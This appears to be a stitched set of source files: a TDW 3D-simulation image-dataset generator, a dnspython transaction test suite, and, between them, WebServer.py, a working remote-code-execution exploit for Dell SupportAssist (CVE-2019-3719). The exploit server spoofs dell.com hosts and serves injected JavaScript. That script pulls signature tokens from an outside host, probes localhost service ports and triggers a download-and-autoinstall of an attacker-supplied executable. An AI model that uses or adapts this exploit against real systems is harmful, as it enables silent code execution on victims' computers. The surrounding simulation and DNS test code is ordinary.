{"$type": "teleport_object",
"id": o_id,
"position": p.object_position},
{"$type": "rotate_object_to",
"id": o_id,
"rotation": p.object_rotation}]
# Set the visual materials.
if self.materials is not None:
if record.name not in self.substructures:
self.substructures.update({record.name: record.substructure})
for sub_object in self.substructures[record.name]:
for i in range(len(self.substructures[record.name][sub_object["name"]])):
material_name = self.materials[RNG.randint(0, len(self.materials))].name
commands.extend([self.get_add_material(material_name),
{"$type": "set_visual_material",
"id": o_id,
"material_name": material_name,
"object_name": sub_object["name"],
"material_index": i}])
# Maybe set a new skybox.
# Rotate the skybox.
if self.skyboxes:
hdri_index, skybox_count, command = self.set_skybox(self.skyboxes, its_per_skybox, hdri_index, skybox_count)
if command:
commands.append(command)
commands.append({"$type": "rotate_hdri_skybox_by",
"angle": RNG.uniform(0, 360)})
resp = self.communicate(commands)
# Create a thread to save the image.
t = Thread(target=self.save_image, args=(resp, record, file_index, root_dir, wnid, train, train_count))
t.daemon = True
t.start()
train += 1
file_index += 1
image_count += 1
t1 = time()
# Stop sending images.
# Destroy the object.
# Unload asset bundles.
self.communicate([{"$type": "send_images",
"frequency": "never"},
{"$type": "destroy_object",
"id": o_id},
{"$type": "unload_asset_bundles"}])
return t1 - t0
def save_image(self, resp, record: ModelRecord, image_count: int, root_dir: str, wnid: str, train: int, train_count: int) -> None:
"""
Save an image.
:param resp: The raw response data.
:param record: The model record.
:param image_count: The image count.
:param root_dir: The root directory.
:param wnid: The wnid.
:param train: Number of train images so far.
:param train_count: Total number of train images to generate.
"""
# Get the directory.
directory = Path(root_dir).joinpath("train" if train < train_count else "val").joinpath(wnid).resolve()
if not os.path.exists(directory):
# Try to make the directories. Due to threading, they might already be made.
try:
os.makedirs(directory)
except:
pass
# Save the image.
filename = f"{record.name}_{image_count:04d}"
# Save the image without resizing.
if self.screen_size == self.output_size:
TDWUtils.save_images(Images(resp[0]), filename,
output_directory=directory)
# Resize the image and save it.
else:
TDWUtils.save_images(Images(resp[0]), filename,
output_directory=directory,
resize_to=(self.output_size, self.output_size))
def get_optimal_grayscale(self, o_id: int, a_id: str, o_p: dict, a_p: dict) -> float:
"""
Get the "optimal" grayscale value of the object if there wasn't any occlusion.
:param o_id: The ID of the object.
:param a_id: The ID of the avatar.
:param o_p: The position of the object.
:param a_p: The position of the avatar.
:return: The grayscale value.
"""
# Teleport the object into the sky.
# Teleport the avatar into the sky.
# Return the grayscale value.
return IdPassGrayscale(self.communicate([{"$type": "teleport_object",
"id": o_id,
"position": {"x": o_p["x"],
"y": o_p["y"] + 500,
"z": o_p["z"]}},
{"$type": "teleport_avatar_to",
"avatar_id": a_id,
"position": {"x": a_p["x"],
"y": a_p["y"] + 500,
"z": a_p["z"]}},
{"$type": "send_id_pass_grayscale",
"frequency": "once"}
])[0]).get_grayscale()
def get_real_grayscale(self, o_id: int, a_id: str, e: Environment) -> (float, float, dict, dict, dict, dict):
"""
Get the "real" grayscale value of an image we hope to capture.
:param o_id: The ID of the object.
:param a_id: The ID of the avatar.
:param e: The environment.
:return: (grayscale, distance, avatar_position, object_position, object_rotation, avatar_rotation)
"""
# Get a random position for the avatar.
a_p = np.array([RNG.uniform(-e.w / 2, e.w / 2) + e.x,
RNG.uniform(0.4, e.h * self.max_height),
RNG.uniform(-e.l / 2, e.l / 2) + e.z])
# Get a random distance from the avatar.
d = RNG.uniform(0.8, 3)
# Get a random position for the object constrained to the environment bounds.
o_p = SingleObject.sample_spherical() * d
# Clamp the y value to positive.
o_p[1] = abs(o_p[1])
o_p = a_p + o_p
# Clamp the y value of the object.
if o_p[1] > e.h * self.max_height:
o_p[1] = e.h * self.max_height
# Convert the avatar's position to a Vector3.
a_p = TDWUtils.array_to_vector3(a_p)
# Set random camera rotations.
yaw = RNG.uniform(-15, 15)
pitch = RNG.uniform(-15, 15)
# Convert the object position to a Vector3.
o_p = TDWUtils.array_to_vector3(o_p)
# Add rotation commands.
# If we're clamping the rotation, rotate the object within +/- 30 degrees on each axis.
if self.clamp_rotation:
o_rot = None
commands = [{"$type": "rotate_object_to",
"id": o_id,
"rotation": {"x": 0, "y": 0, "z": 0, "w": 0}},
{"$type": "rotate_object_by",
"id": o_id,
"angle": RNG.uniform(-30, 30),
"axis": "pitch"},
{"$type": "rotate_object_by",
"id": o_id,
"angle": RNG.uniform(-30, 30),
"axis": "yaw"},
{"$type": "rotate_object_by",
"id": o_id,
"angle": RNG.uniform(-30, 30),
"axis": "roll"}]
# Set a totally random rotation.
else:
o_rot = {"x": RNG.uniform(-360, 360),
"y": RNG.uniform(-360, 360),
"z": RNG.uniform(-360, 360),
"w": RNG.uniform(-360, 360),
}
commands = [{"$type": "rotate_object_to",
"id": o_id,
"rotation": o_rot}]
# After rotating the object:
# 1. Teleport the object.
# 2. Teleport the avatar.
# 3. Look at the object.
# 4. Perturb the camera slightly.
# 5. Send grayscale data and image sensor data.
commands.extend([{"$type": "teleport_object",
"id": o_id,
"position": o_p},
{"$type": "teleport_avatar_to",
"avatar_id": a_id,
"position": a_p},
{"$type": "look_at",
"avatar_id": a_id,
"object_id": o_id,
"use_centroid": True},
{"$type": "rotate_sensor_container_by",
"angle": pitch,
"avatar_id": "a",
"axis": "pitch"},
{"$type": "rotate_sensor_container_by",
"angle": yaw,
"avatar_id": "a",
"axis": "yaw"},
{"$type": "send_id_pass_grayscale",
"frequency": "once"},
{"$type": "send_image_sensors",
"frequency": "once"}])
resp = self.communicate(commands)
# Parse the output data:
# 1. The grayscale value of the image.
# 2. The camera rotation.
grayscale = 0
cam_rot = None
for r in resp[:-1]:
r_id = OutputData.get_data_type_id(r)
if r_id == "idgs":
grayscale = IdPassGrayscale(r).get_grayscale()
elif r_id == "imse":
cam_rot = ImageSensors(r).get_sensor_rotation(0)
cam_rot = {"x": cam_rot[0], "y": cam_rot[1], "z": cam_rot[2], "w": cam_rot[3]}
# If we clamped the rotation of the object, we need to know its quaternion.
if self.clamp_rotation:
resp = self.communicate({"$type": "send_transforms",
"frequency": "once",
"ids": [o_id]})
t = Transforms(resp[0])
o_rot = t.get_rotation(0)
o_rot = {"x": o_rot[0],
"y": o_rot[1],
"z": o_rot[2],
"w": o_rot[3],}
return grayscale, d, a_p, o_p, o_rot, cam_rot
@staticmethod
def sample_spherical(npoints=1, ndim=3) -> np.array:
vec = RNG.randn(ndim, npoints)
vec /= np.linalg.norm(vec, axis=0)
return np.array([vec[0][0], vec[1][0], vec[2][0]])
@staticmethod
def zip_images(zip_dir: Path) -> None:
"""
Zip up the images.
:param zip_dir: The zip directory.
"""
if not zip_dir.exists():
zip_dir.mkdir()
# Use a random token to avoid overwriting zip files.
token = token_urlsafe(4)
zip_path = zip_dir.joinpath(f"images_{token}.zip")
images_directory = str(zip_dir.joinpath("images").resolve())
# Create the zip file. If it is made, remove the original directory.
zip_call = f'C:/Program Files/7-Zip/7z.exe a -r {str(zip_path.resolve())} {images_directory} -sdel'
call(zip_call)
if __name__ == "__main__":
from argparse import ArgumentParser
parser = ArgumentParser()
parser.add_argument("--scene_name", type=str, default="tdw_room",
help="The name of the scene. For a complete list: librarian.fetch_all_scene_records()")
parser.add_argument("--output_dir", type=str, default="D:/Test",
help="The absolute path to the output directory.")
parser.add_argument("--materials", action="store_true", help="Set random visual materials per frame.")
parser.add_argument("--new", action="store_true", help="Start a new dataset (erases the log of completed models).")
parser.add_argument("--screen_size", type=int, default=256, help="The screen size of the build.")
parser.add_argument("--output_size", type=int, default=256, help="Images are resized to this from the screen size.")
parser.add_argument("--hdri", action="store_true", help="Use a random HDRI skybox per frame.")
parser.add_argument("--hide", action="store_true", help="Hide all objects.")
parser.add_argument("--clamp_rotation", action="store_true",
help="Clamp rotation to +/- 30 degrees on each axis, rather than totally random.")
parser.add_argument("--port", type=int, default=1071, help="The port for the controller and build.")
parser.add_argument("--launch_build", action="store_true",
help="Automatically launch the build. "
"Don't add this if you're running the script on a Linux server.")
parser.add_argument("--max_height", type=float, default=1,
help="Objects and avatars can be at this percentage of the scene bounds height. Must be between 0 and 1.")
parser.add_argument("--grayscale", type=float, default=0.5,
help="Target grayscale value. Must be between 0 and 1. Higher value = better composition and slower FPS.")
parser.add_argument("--less_dark", action="store_true", help='Prefer fewer "dark" skyboxes.')
parser.add_argument("--id_pass", action="store_true", help="Include the _id pass.")
parser.add_argument("--no_overwrite", action="store_true",
help="If true, don't overwrite existing images, and start indexing after the highest index.")
parser.add_argument("--zip", action="store_true",
help="Zip the images after finishing the dataset. Requires Windows and 7zip.")
parser.add_argument("--train", type=int, default=1300000, help="Total number of train images.")
parser.add_argument("--val", type=int, default=50000, help="Total number of val images.")
parser.add_argument("--library", type=str, default="models_core.json", help="The path to the model library records.")
parser.add_argument("--temp_urls", action="store_true",
help="If included and `--library models_full.json`, the build will use temporary (pre-signed) "
"URLs to download models in the tdw-private bucket. "
"Include this flag only if you're experiencing segfaults on Linux.")
args = parser.parse_args()
s = SingleObject(port=args.port,
launch_build=args.launch_build,
visual_material_swapping=args.materials,
new=args.new,
screen_size=args.screen_size,
output_size=args.output_size,
hdri=args.hdri,
show_objects=not args.hide,
clamp_rotation=args.clamp_rotation,
max_height=args.max_height,
grayscale_threshold=args.grayscale,
less_dark=args.less_dark,
id_pass=args.id_pass,
no_overwrite=args.no_overwrite,
do_zip=args.zip,
train=args.train,
val=args.val,
library=args.library,
temp_urls=args.temp_urls is not None)
s.run(args.output_dir,
scene_name=args.scene_name)
|
WebServer.py
|
from aiohttp import web
import asyncio
import string
import random
from threading import Thread
filename = ""
PAYLOAD = '''<script>var signatures = null;
var ports = [8884, 8883, 8886, 8885];
var server_port = 0;
function SendRequest(url) {
var x = new XMLHttpRequest();
x.open("GET", url, false);
//x.timeout = 3500;
x.send(null);
return {status: x.status, text: x.responseText};
}
function SendAsyncRequest(url, callback) {
var x = new XMLHttpRequest();
x.open("GET", url, true);
x.onreadystatechange = callback;
//x.timeout = 3500;
x.send(null);
return {status: x.status, text: x.responseText};
}
function InitializeSignatures() {
var signature_url = "https://bills-sandbox.000webhostapp.com/GetDellSignatures.php";
var response = SendRequest(signature_url);
if(response.status == 200) {
signatures = JSON.parse(response.text);
} else { // fuck this shouldn't happen
console.log("fuck");
}
}
function FindServer() {
ports.forEach(function(port) {
var is_alive_url = "http://127.0.0.1:" + port + "/clientservice/isalive/?expires=" + signatures.Expires + "&signature=" + signatures.IsaliveToken;
var response = SendAsyncRequest(is_alive_url, function(){server_port = port;});
});
}
function guid() {
function s4() {
return Math.floor((1 + Math.random()) * 0x10000)
.toString(16)
.substring(1);
}
return s4() + s4() + '-' + s4() + '-' + s4() + '-' + s4() + '-' + s4() + s4() + s4();
}
function SendRCEPayload() {
var auto_install_url = "http://127.0.0.1:" + server_port + "/downloadservice/downloadandautoinstall?expires=" + signatures.Expires + "&signature=" + signatures.DownloadAndAutoInstallToken;
var xmlhttp = new XMLHttpRequest(); // new HttpRequest instance
xmlhttp.open("POST", auto_install_url, true);
var files = [];
files.push({
"title": "SupportAssist RCE",
"category": "Serial ATA",
"name": "calc.EXE",
"location": " http://downloads.dell.com/calc.EXE", // those spaces are KEY
"isSecure": false,
"fileUniqueId": guid(),
"run": true,
"installOrder": 2,
"restricted": false,
"fileStatus": -99,
"driverId": "FXGNY",
"dupInstallReturnCode": 0,
"cssClass": "inactive-step",
"isReboot": false,
"scanPNPId": "PCI\\VEN_8086&DEV_282A&SUBSYS_08851028&REV_10",
"$$hashKey": "object:210"});
xmlhttp.send(JSON.stringify(files));
}
function GetClientSystemInfo() {
var signature = signatures.ClientSystemInfoToken;
var expires = signatures.Expires;
var system_info_url = "http://127.0.0.1:" + server_port + "/clientservice/getclientsysteminfo?expires=" + signatures.Expires + "&signature=" + signatures.ClientSystemInfoToken + "&includeServiceTag=true&includeHealthInfo=true&includeCurrentsystemConfig=true";
SendAsyncRequest(system_info_url, function(){ console.log(this.responseText);});
}
var port_timer;
function onFindPort() {
clearTimeout(port_timer);
SendRCEPayload();
}
InitializeSignatures();
FindServer();
port_timer = setTimeout(function(){if(server_port != 0){onFindPort()}}, 200);</script><h1>CVE-2019-3719</h1>'''
def id_generator(size=6, chars=string.ascii_uppercase + string.digits):
return ''.join(random.choice(chars) for _ in range(size))
def handle(request):
global filename
global PAYLOAD
if request.headers["Host"] is not None:
if "downloads.dell.com" in request.headers["Host"]:
print("[+] Exploit binary requested.")
return web.FileResponse(filename)
elif "dell.com" in request.headers["Host"]:
print("[+] Exploit payload requested.")
return web.Response(text=PAYLOAD, headers={'Content-Type': 'text/html'})
redirect_url = "http://dellrce.dell.com"
return web.HTTPFound(redirect_url)
class WebServer:
def __init__(self, payload_filename):
global filename
filename = payload_filename
self.loop = asyncio.get_event_loop()
app = web.Application(debug=True)
app.add_routes([web.get('/{a:.*}', handle)])
handler = app.make_handler()
self.server = self.loop.create_server(handler, host='0.0.0.0', port=80)
self.server_thread = Thread(target=self.server_handler, args=(self,))
self.server_thread.start()
print("[+] Webserver started.")
def server_handler(self, arg):
self.loop.run_until_complete(self.server)
self.loop.run_forever()
|
test_transaction.py
|
# Copyright (C) Dnspython Contributors, see LICENSE for text of ISC license
import time
import pytest
import dns.name
import dns.rdataclass
import dns.rdatatype
import dns.rdataset
import dns.rrset
import dns.transaction
import dns.versioned
import dns.zone
class DB(dns.transaction.TransactionManager):
def __init__(self):
self.rdatasets = {}
def reader(self):
return Transaction(self, False, True)
def writer(self, replacement=False):
return Transaction(self, replacement, False)
def origin_information(self):
return (dns.name.from_text('example'), True, dns.name.empty)
def get_class(self):
return dns.rdataclass.IN
class Transaction(dns.transaction.Transaction):
def __init__(self, db, replacement, read_only):
super().__init__(db, replacement, read_only)
self.rdatasets = {}
if not replacement:
self.rdatasets.update(db.rdatasets)
@property
def db(self):
return self.manager
def _get_rdataset(self, name, rdtype, covers):
return self.rdatasets.get((name, rdtype, covers))
def _put_rdataset(self, name, rdataset):
self.rdatasets[(name, rdataset.rdtype, rdataset.covers)] = rdataset
def _delete_name(self, name):
remove = []
for key in self.rdatasets.keys():
if key[0] == name:
remove.append(key)
if len(remove) > 0:
for key in remove:
del self.rdatasets[key]
def _delete_rdataset(self, name, rdtype, covers):
del self.rdatasets[(name, rdtype, covers)]
def _name_exists(self, name):
for key in self.rdatasets.keys():
if key[0] == name:
return True
return False
def _changed(self):
if self.read_only:
return False
else:
return len(self.rdatasets) > 0
def _end_transaction(self, commit):
if commit:
self.db.rdatasets = self.rdatasets
def _set_origin(self, origin):
pass
@pytest.fixture
def db():
db = DB()
rrset = dns.rrset.from_text('content', 300, 'in', 'txt', 'content')
db.rdatasets[(rrset.name, rrset.rdtype, 0)] = rrset
return db
def test_basic(db):
# successful txn
with db.writer() as txn:
rrset = dns.rrset.from_text('foo', 300, 'in', 'a',
'10.0.0.1', '10.0.0.2')
txn.add(rrset)
assert txn.name_exists(rrset.name)
assert db.rdatasets[(rrset.name, rrset.rdtype, 0)] == \
rrset
# rollback
with pytest.raises(Exception):
with db.writer() as txn:
rrset2 = dns.rrset.from_text('foo', 300, 'in', 'a',
'10.0.0.3', '10.0.0.4')
txn.add(rrset2)
raise Exception()
assert db.rdatasets[(rrset.name, rrset.rdtype, 0)] == \
rrset
with db.writer() as txn:
txn.delete(rrset.name)
assert db.rdatasets.get((rrset.name, rrset.rdtype, 0)) \
is None
def test_get(db):
with db.writer() as txn:
content = dns.name.from_text('content', None)
rdataset = txn.get(content, dns.rdatatype.TXT)
assert rdataset is not None
assert rdataset[0].strings == (b'content',)
assert isinstance(rdataset, dns.rdataset.ImmutableRdataset)
def test_add(db):
with db.writer() as txn:
rrset = dns.rrset.from_text('foo', 300, 'in', 'a',
'10.0.0.1', '10.0.0.2')
txn.add(rrset)
rrset2 = dns.rrset.from_text('foo', 300, 'in', 'a',
'10.0.0.3', '10.0.0.4')
txn.add(rrset2)
expected = dns.rrset.from_text('foo', 300, 'in', 'a',
'10.0.0.1', '10.0.0.2',
'10.0.0.3', '10.0.0.4')
assert db.rdatasets[(rrset.name, rrset.rdtype, 0)] == \
expected
def test_replacement(db):
with db.writer() as txn:
rrset = dns.rrset.from_text('foo', 300, 'in', 'a',
'10.0.0.1', '10.0.0.2')
txn.add(rrset)
rrset2 = dns.rrset.from_text('foo', 300, 'in', 'a',
'10.0.0.3', '10.0.0.4')
txn.replace(rrset2)
assert db.rdatasets[(rrset.name, rrset.rdtype, 0)] == \
rrset2
def test_delete(db):
with db.writer() as txn:
txn.delete(dns.name.from_text('nonexistent', None))
content = dns.name.from_text('content', None)
content2 = dns.name.from_text('content2', None)
txn.delete(content)
assert not txn.name_exists(content)
txn.delete(content2, dns.rdatatype.TXT)
rrset = dns.rrset.from_text('content', 300, 'in', 'txt', 'new-content')
txn.add(rrset)
assert txn.name_exists(content)
txn.delete(content, dns.rdatatype.TXT)
assert not txn.name_exists(content)
rrset = dns.rrset.from_text('content2', 300, 'in', 'txt', 'new-content')
txn.delete(rrset)
content_keys = [k for k in db.rdatasets if k[0] == content]
assert len(content_keys) == 0
def test_delete_exact(db):
with db.writer() as txn:
rrset = dns.rrset.from_text('content', 300, 'in', 'txt', 'bad-content')
with pytest.raises(dns.transaction.DeleteNotExact):
txn.delete_exact(rrset)
rrset = dns.rrset.from_text('content2', 300, 'in', 'txt', 'bad-content')
with pytest.raises(dns.transaction.DeleteNotExact):
txn.delete_exact(rrset)
with pytest.raises(dns.transaction.DeleteNotExact):
txn.delete_exact(rrset.name)
with pytest.raises(dns.transaction.DeleteNotExact):
txn.delete_exact(rrset.name, dns.rdatatype.TXT)
rrset = dns.rrset.from_text('content', 300, 'in', 'txt', 'content')
txn.delete_exact(rrset)
assert db.rdatasets.get((rrset.name, rrset.rdtype, 0)) \
is None
def test_parameter_forms(db):
with db.writer() as txn:
foo = dns.name.from_text('foo', None)
rdataset = dns.rdataset.from_text('in', 'a', 300,
'10.0.0.1', '10.0.0.2')
rdata1 = dns.rdata.from_text('in', 'a', '10.0.0.3')
rdata2 = dns.rdata.from_text('in', 'a', '10.0.0.4')
txn.add(foo, rdataset)
txn.add(foo, 100, rdata1)
txn.add(foo, 30, rdata2)
expected = dns.rrset.from_text('foo', 30, 'in', 'a',
'10.0.0.1', '10.0.0.2',
'10.0.0.3', '10.0.0.4')
assert db.rdatasets[(foo, rdataset.rdtype, 0)] == \
expected
with db.writer() as txn:
txn.delete(foo, rdataset)
txn.delete(foo, rdata1)
txn.delete(foo, rdata2)
assert db.rdatasets.get((foo, rdataset.rdtype, 0)) \
is None
def test_bad_parameters(db):
with db.writer() as txn:
with pytest.raises(TypeError):
txn.add(1)
with pytest.raises(TypeError):
rrset = dns.rrset.from_text('bar', 300, 'in', 'txt', 'bar')
txn.add(rrset, 1)
with pytest.raises(ValueError):
foo = dns.name.from_text('foo', None)
rdata = dns.rdata.from_text('in', 'a', '10.0.0.3')
txn.add(foo, 0x80000000, rdata)
with pytest.raises(TypeError):
txn.add(foo)
with pytest.raises(TypeError):
txn.add()
with pytest.raises(TypeError):
txn.add(foo, 300)
with pytest.raises(TypeError):
txn.add(foo, 300, 'hi')
with pytest.raises(TypeError):
txn.add(foo, 'hi')
with pytest.raises(TypeError):
txn.delete()
with pytest.raises(TypeError):
txn.delete(1)
def test_cannot_store_non_origin_soa(db):
with pytest.raises(ValueError):
with db.writer() as txn:
rrset = dns.rrset.from_text('foo', 300, 'in', 'SOA',
'. . 1 2 3 4 5')
txn.add(rrset)
example_text = """$TTL 3600
$ORIGIN example.
@ soa foo bar 1 2 3 4 5
@ ns ns1
@ ns ns2
ns1 a 10.0.0.1
ns2 a 10.0.0.2
$TTL 300
$ORIGIN foo.example.
bar mx 0 blaz
"""
example_text_output = """@ 3600 IN SOA foo bar 1 2 3 4 5
@ 3600 IN NS ns1
@ 3600 IN NS ns2
@ 3600 IN NS ns3
ns1 3600 IN A 10.0.0.1
ns2 3600 IN A 10.0.0.2
ns3 3600 IN A 10.0.0.3
"""
@pytest.fixture(params=[dns.zone.Zone, dns.versioned.Zone])
def zone(request):
return dns.zone.from_text(example_text, zone_factory=request.param)
def test_zone_basic(zone):
with zone.writer() as txn:
txn.delete(dns.name.from_text('bar.foo', None))
rd = dns.rdata.from_text('in', 'ns', 'ns3')
txn.add(dns.name.empty, 3600, rd)
rd = dns.rdata.from_text('in', 'a', '10.0.0.3')
txn.add(dns.name.from_text('ns3', None), 3600, rd)
output = zone.to_text()
assert output == example_text_output
def test_explicit_rollback_and_commit(zone):
with zone.writer() as txn:
assert not txn.changed()
txn.delete(dns.name.from_text('bar.foo', None))
txn.rollback()
assert zone.get_node('bar.foo') is not None
with zone.writer() as txn:
assert not txn.changed()
txn.delete(dns.name.from_text('bar.foo', None))
txn.commit()
assert zone.get_node('bar.foo') is None
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.delete(dns.name.from_text('bar.foo', None))
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.add('bar.foo', 300, dns.rdata.from_text('in', 'txt', 'hi'))
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.replace('bar.foo', 300, dns.rdata.from_text('in', 'txt', 'hi'))
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.reader() as txn:
txn.rollback()
txn.get('bar.foo', 'in', 'mx')
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.delete_exact('bar.foo')
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.name_exists('bar.foo')
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.update_serial()
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.changed()
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.rollback()
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.commit()
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
for rdataset in txn:
pass
def test_zone_changed(zone):
# Read-only is not changed!
with zone.reader() as txn:
assert not txn.changed()
# delete an existing name
with zone.writer() as txn:
assert not txn.changed()
txn.delete(dns.name.from_text('bar.foo', None))
assert txn.changed()
# delete a nonexistent name
with zone.writer() as txn:
assert not txn.changed()
txn.delete(dns.name.from_text('unknown.bar.foo', None))
assert not txn.changed()
# delete a nonexistent rdataset from an extant node
with zone.writer() as txn:
assert not txn.changed()
txn.delete(dns.name.from_text('bar.foo', None), 'txt')
assert not txn.changed()
# add an rdataset to an extant Node
with zone.writer() as txn:
assert not txn.changed()
txn.add('bar.foo', 300, dns.rdata.from_text('in', 'txt', 'hi'))
assert txn.changed()
# add an rdataset to a nonexistent Node
with zone.writer() as txn:
assert not txn.changed()
txn.add('foo.foo', 300, dns.rdata.from_text('in', 'txt', 'hi'))
assert txn.changed()
def test_zone_base_layer(zone):
with zone.writer() as txn:
# Get a set from the zone layer
rdataset = txn.get(dns.name.empty, dns.rdatatype.NS, dns.rdatatype.NONE)
expected = dns.rdataset.from_text('in', 'ns', 300, 'ns1', 'ns2')
assert rdataset == expected
def test_zone_transaction_layer(zone):
with zone.writer() as txn:
# Make a change
rd = dns.rdata.from_text('in', 'ns', 'ns3')
txn.add(dns.name.empty, 3600, rd)
# Get a set from the transaction layer
expected = dns.rdataset.from_text('in', 'ns', 300, 'ns1', 'ns2', 'ns3')
rdataset = txn.get(dns.name.empty, dns.rdatatype.NS, dns.rdatatype.NONE)
assert rdataset == expected
assert txn.name_exists(dns.name.empty)
ns1 = dns.name.from_text('ns1', None)
assert txn.name_exists(ns1)
ns99 = dns.name.from_text('ns99', None)
assert not txn.name_exists(ns99)
def test_zone_add_and_delete(zone):
with zone.writer() as txn:
a99 = dns.name.from_text('a99', None)
a100 = dns.name.from_text('a100', None)
a101 = dns.name.from_text('a101', None)
rds = dns.rdataset.from_text('in', 'a', 300, '10.0.0.99')
txn.add(a99, rds)
txn.delete(a99, dns.rdatatype.A)
txn.delete(a100, dns.rdatatype.A)
txn.delete(a101)
assert not txn.name_exists(a99)
assert not txn.name_exists(a100)
assert not txn.name_exists(a101)
ns1 = dns.name.from_text('ns1', None)
txn.delete(ns1, dns.rdatatype.A)
assert not txn.name_exists(ns1)
with zone.writer() as txn:
txn.add(a99, rds)
txn.delete(a99)
assert not txn.name_exists(a99)
with zone.writer() as txn:
txn.add(a100, rds)
txn.delete(a99)
assert not txn.name_exists(a99)
assert txn.name_exists(a100)
def test_write_after_rollback(zone):
with pytest.raises(ExpectedException):
with zone.writer() as txn:
a99 = dns.name.from_text('a99', None)
rds = dns.rdataset.from_text('in', 'a', 300, '10.0.0.99')
txn.add(a99, rds)
raise ExpectedException
with zone.writer() as txn:
a99 = dns.name.from_text('a99', None)
rds = dns.rdataset.from_text('in', 'a', 300, '10.99.99.99')
txn.add(a99, rds)
assert zone.get_rdataset('a99', 'a') == rds
def test_zone_get_deleted(zone):
with zone.writer() as txn:
ns1 = dns.name.from_text('ns1', None)
assert txn.get(ns1, dns.rdatatype.A) is not None
txn.delete(ns1)
assert txn.get(ns1, dns.rdatatype.A) is None
ns2 = dns.name.from_text('ns2', None)
txn.delete(ns2, dns.rdatatype.A)
assert txn.get(ns2, dns.rdatatype.A) is None
def test_zone_bad_class(zone):
with zone.writer() as txn:
rds = dns.rdataset.from_text('ch', 'ns', 300, 'ns1', 'ns2')
with pytest.raises(ValueError):
txn.add(dns.name.empty, rds)
with pytest.raises(ValueError):
txn.replace(dns.name.empty, rds)
with pytest.raises(ValueError):
txn.delete(dns.name.empty, rds)
def test_update_serial(zone):
# basic
with zone.writer() as txn:
txn.update_serial()
rdataset = zone.find_rdataset('@', 'soa')
assert rdataset[0].serial == 2
# max
with zone.writer() as txn:
txn.update_serial(0xffffffff, False)
rdataset = zone.find_rdataset('@', 'soa')
assert rdataset[0].serial == 0xffffffff
# wraparound to 1
with zone.writer() as txn:
txn.update_serial()
rdataset = zone.find_rdataset('@', 'soa')
assert rdataset[0].serial == 1
# trying to set to zero sets to 1
with zone.writer() as txn:
txn.update_serial(0, False)
rdataset = zone.find_rdataset('@', 'soa')
assert rdataset[0].serial == 1
with pytest.raises(KeyError):
with zone.writer() as txn:
txn.update_serial(name=dns.name.from_text('unknown', None))
with pytest.raises(ValueError):
with zone.writer() as txn:
txn.update_serial(-1)
with pytest.raises(ValueError):
with zone.writer() as txn:
txn.update_serial(2**31)
class ExpectedException(Exception):
pass
def test_zone_rollback(zone):
a99 = dns.name.from_text('a99.example.')
try:
with zone.writer() as txn:
rds = dns.rdataset.from_text('in', 'a', 300, '10.0.0.99')
txn.add(a99, rds)
assert txn.name_exists(a99)
raise ExpectedException
except ExpectedException:
pass
assert not zone.get_node(a99)
def test_zone_ooz_name(zone):
with zone.writer() as txn:
with pytest.raises(KeyError):
a99 = dns.name.from_text('a99.not-example.')
assert txn.name_exists(a99)
def test_zone_iteration(zone):
expected = {}
for (name, rdataset) in zone.iterate_rdatasets():
expected[(name, rdataset.rdtype, rdataset.covers)] = rdataset
with zone.writer() as txn:
actual = {}
for (name, rdataset) in txn:
actual[(name, rdataset.rdtype, rdataset.covers)] = rdataset
assert actual == expected
@pytest.fixture
def vzone():
return dns.zone.from_text(example_text, zone_factory=dns.versioned.Zone)
def test_vzone_read_only(vzone):
with vzone.reader() as txn:
rdataset = txn.get(dns.name.empty, dns.rdatatype.NS, dns.rdatatype.NONE)
expected = dns.rdataset.from_text('in', 'ns', 300, 'ns1', 'ns2')
assert rdataset == expected
with pytest.raises(dns.transaction.ReadOnly):
txn.replace(dns.name.empty, expected)
def test_vzone_multiple_versions(vzone):
assert len(vzone._versions) == 1
vzone.set_max_versions(None) # unlimited!
with vzone.writer() as txn:
txn.update_serial()
with vzone.writer() as txn:
txn.update_serial()
with vzone.writer() as txn:
txn.update_serial(1000, False)
rdataset = vzone.find_rdataset('@', 'soa')
assert rdataset[0].serial == 1000
assert len(vzone._versions) == 4
with vzone.reader(id=5) as txn:
assert txn.version.id == 5
rdataset = txn.get('@', 'soa')
assert rdataset[0].serial == 1000
with vzone.reader(serial=1000) as txn:
assert txn.version.id == 5
rdataset = txn.get('@', 'soa')
assert rdataset[0].serial == 1000
vzone.set_max_versions(2)
assert len(vzone._versions) == 2
# The ones that survived should be 3 and 1000
rdataset = vzone._versions[0].get_rdataset(dns.name.empty,
dns.rdatatype.SOA,
dns.rdatatype.NONE)
assert rdataset[0].serial == 3
rdataset = vzone._versions[1].get_rdataset(dns.name.empty,
dns.rdatatype.SOA,
dns.rdatatype.NONE)
assert rdataset[0].serial == 1000
with pytest.raises(ValueError):
vzone.set_max_versions(0)
# for debugging if needed
def _dump(zone):
for v in zone._versions:
print('VERSION', v.id)
for (name, n) in v.nodes.items():
for rdataset in n:
print(rdataset.to_text(name))
def test_vzone_open_txn_pins_versions(vzone):
assert len(vzone._versions) == 1
vzone.set_max_versions(None) # unlimited!
with vzone.writer() as txn:
txn.update_serial()
with vzone.writer() as txn:
txn.update_serial()
with vzone.writer() as txn:
txn.update_serial()
with vzone.reader(id=2) as txn:
vzone.set_max_versions(1)
with vzone.reader(id=3) as txn:
rdataset = txn.get('@', 'soa')
assert rdataset[0].serial == 2
assert len(vzone._versions) == 4
assert len(vzone._versions) == 1
rdataset = vzone.find_rdataset('@', 'soa')
assert vzone._versions[0].id == 5
assert rdataset[0].serial == 4
try:
import threading
one_got_lock = threading.Event()
def run_one(zone):
with zone.writer() as txn:
one_got_lock.set()
# wait until two blocks
while len(zone._write_waiters) == 0:
time.sleep(0.01)
rds = dns.rdataset.from_text('in', 'a', 300, '10.0.0.98')
txn.add('a98', rds)
def run_two(zone):
